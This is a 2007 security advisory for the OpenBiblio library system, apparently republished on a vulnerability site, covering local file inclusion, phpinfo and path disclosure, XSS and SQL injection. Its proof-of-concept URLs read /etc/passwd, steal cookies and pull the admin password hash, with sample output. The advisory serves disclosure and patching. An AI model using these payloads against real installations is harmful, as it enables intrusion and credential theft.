OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities

Credit: Juan Galiana
Risk: Medium
Local: Yes
Remote: Yes

- Security Advisory - - OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities - ---------------------------------------------------- Product: OpenBiblio Version: Version 0.5.2 Prerelease 4 and prior is affected Url: Affected by: Full path disclosure, local file include, phpinfo disclosure, multiple Cross Site Scripting, SQL injection I. Introduction. OpenBiblio is an easy to use, automated library system written in PHP containing OPAC, circulation, cataloging, and staff administration functionality. OpenBiblio library administration offers an intuitive interface with broad category tabs and sidebar. II. Description OpenBiblio suffers multiple bugs. 1) Local File Include vulnerability: its posible to include any arbitrary local file using shared/help.php file - Code - if (isset($_GET["page"])) { $page = $_GET["page"]; } else { $page = "contents"; } include("../locale/".OBIB_LOCALE."/help/".$page.".php"); - PoC - http://site/openbiblio/shared/help.php?page=../../../../../../etc/passwd %00 2) Local File Include (2) (only works with register_globals On and for non php files magic_quotes_gpc must be Off) - Code - <?php include("../navbars/".$tab.".php");?> - PoC - http://site/openbiblio/shared/header.php?tab=../../../etc/passwd%00 3) This link will show phpinfo http://site/openbiblio/phpinfo.php Remove it! 4) Path Disclosure Some samples: http://site/openbiblio/shared/footer.php Fatal error: Call to a member function on a non-object in /httpdocs/openbiblio/shared/footer.php on line 18 http://site/openbiblio/circ/mbr_fields.php Fatal error: Call to a member function on a non-object in /httpdocs/openbiblio/circ/mbr_fields.php on line 14 http://site/openbiblio/admin/custom_marc_form_fields.php Fatal error: Cannot instantiate non-existent class: dmquery in /httpdocs/openbiblio/admin/custom_marc_form_fields.php on line 14 Please, turn display_errors to Off in php.ini 6) Multiple Cross Site Scripting, an attacker can perform an XSS attack that allows him to access the targeted user cookies Some samples: http://site/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRS T=[XSS] http://site/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS] In /admin/theme_preview.php an attacker can inject an XSS in the var themeName with method POST. here is a poc: <form action=" http://site/openbiblio/admin/theme_preview.php" method="post"> <input type="text" name="themeName" size="40" value="<script>alert( document.cookie);</script>"><br><br> <input type="submit" value="doit"> </form> try with: <script>alert(document.cookie);</script> 6) SQL injection (session with report rol is needed to exploit this bug) Any user with report rol can access any field of the database, including admin md5 hash. http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balance DueList&title=Balance+Due+Member+List&sql=%0A++++[SQL]%0A++ with this an attacker can get the md5 admin password: http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balance DueList&title=Balance+Due+Member+List&sql=%0A++++select+username,pwd+fro m+staff%20where+userid=1%0A++ then click "run report" and view the results, besides, you can choose between html and csv format ;) staff.username staff.pwd admin 21232f297a57a5a743894a0e4a801fc3 III. Timeline 20/08/2006 - Bugs discovered 25/08/2006 - Vendor Contacted 30/08/2006 - Release 0.5.2 (parcial patch) 21/02/2007 - Release 0.6.0 (full patch) 28/12/2007 - Advisory Disclosure IV. Solution Upgrade to 0.6.0 from Good work! :) V. Credits Juan Galiana <jgaliana gmail com> Regards

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024,


Back to Top